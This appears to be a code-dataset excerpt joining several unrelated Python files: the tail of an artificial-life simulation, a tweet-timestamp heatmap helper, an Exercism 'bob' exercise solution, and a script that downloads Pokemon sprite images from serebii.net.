                    for each in self.allLife:
                        counter[each.get_type()] += 1
                    NAMES = {1: "Chlorella", 2: "Amoeba", 3: "Halobacteria"}
                    for each in counter.keys():
                        print(NAMES[each], ":", counter[each])
                    sys.exit()
            clock.tick(200)
            self.check_collision()
            self.update_life()
            time.sleep(0.05)  # extra throttle on simulation speed
if __name__ == "__main__":
    # Gather simulation parameters interactively, then run the world loop.
    initial_count = int(input("Enter Initial number of lifeforms : "))
    print("SET MOVEMENT PARAMETERS")
    print("RED Movement, Enter single integer ")
    red_step = int(input())
    print("GREEN Movement, Enter single integer ")
    green_step = int(input())
    print("BLUE Movement, Enter single integer ")
    blue_step = int(input())
    start_energy = int(input("Enter Initial energy level "))
    world = Parsciro(initial_count, red_step, green_step, blue_step, start_energy)
    world.initialize_life()
    world.life_loop()
| true |
c7b981deb33fc7bcc4db3165feeae6a24f59e538 | Python | aujohankn/Twitter-bots | /twitter_timemaps.py | UTF-8 | 383 | 2.5625 | 3 | [] | no_license | import os
import pandas as pd
import tm_tools
def heatmap_plot(userID):
# Reads the tweet timestamps from a specific Twitter account and generates the heated time map
print("Heatmap plot")
path = os.getcwd()+"\ScrapedData\Tweets\\"
df = pd.read_csv(path+"tweet" + str(userID) + ".csv")['created_at'].values.tolist()
tm_tools.analyze_tweet_times(str(userID), df) | true |
0ac222a08252ae742a95e625bc6cfbc4218ffbf0 | Python | glennj/exercism.io | /python/bob/bob.py | UTF-8 | 412 | 3.3125 | 3 | [] | no_license | def response(phrase):
phrase = phrase.rstrip()
shouting = phrase.isupper()
asking = phrase.endswith('?')
silence = phrase == ""
if shouting and asking:
return "Calm down, I know what I'm doing!"
elif shouting:
return "Whoa, chill out!"
elif asking:
return "Sure."
elif silence:
return "Fine. Be that way!"
else:
return "Whatever."
| true |
730a0d5b08ff4483baef3bc4b990324c32c95fb3 | Python | josh-perry/pokemon-hm-slave-finder | /scraper/get_pokemon_img.py | UTF-8 | 1,310 | 2.921875 | 3 | [] | no_license | import requests
import os
import time
art_urls = [
"https://www.serebii.net/pokearth/sprites/rb/{}.png",
"https://www.serebii.net/pokearth/sprites/gold/{}.png",
"https://www.serebii.net/pokearth/sprites/rs/{}.png",
"https://www.serebii.net/pokearth/sprites/dp/{}.png"
]
pokemon_count = [
151,
251,
386,
493
]
def get_pokemon_art(gen):
print("Getting img for gen {}".format(gen))
gen -= 1
save_directory = "cache/img/gen{}".format(gen+1)
os.makedirs(save_directory, exist_ok=True)
for i in range(1, pokemon_count[gen] + 1):
filename = str(i).zfill(3)
img_url = art_urls[gen].format(filename)
save_path = "{}/{}.png".format(save_directory, filename)
if os.path.isfile(save_path):
print("Skipping {} as it already exists".format(filename))
continue
r = requests.get(img_url)
if r.status_code != 200:
print("{} returned a {}!".format(img_url, r.status_code))
time.sleep(30)
continue
with open(save_path, "wb+") as file:
for chunk in r:
file.write(chunk)
print("{} saved".format(save_path))
time.sleep(1)
if __name__ == '__main__':
for gen in range(1, 4+1):
get_pokemon_art(gen)
| true |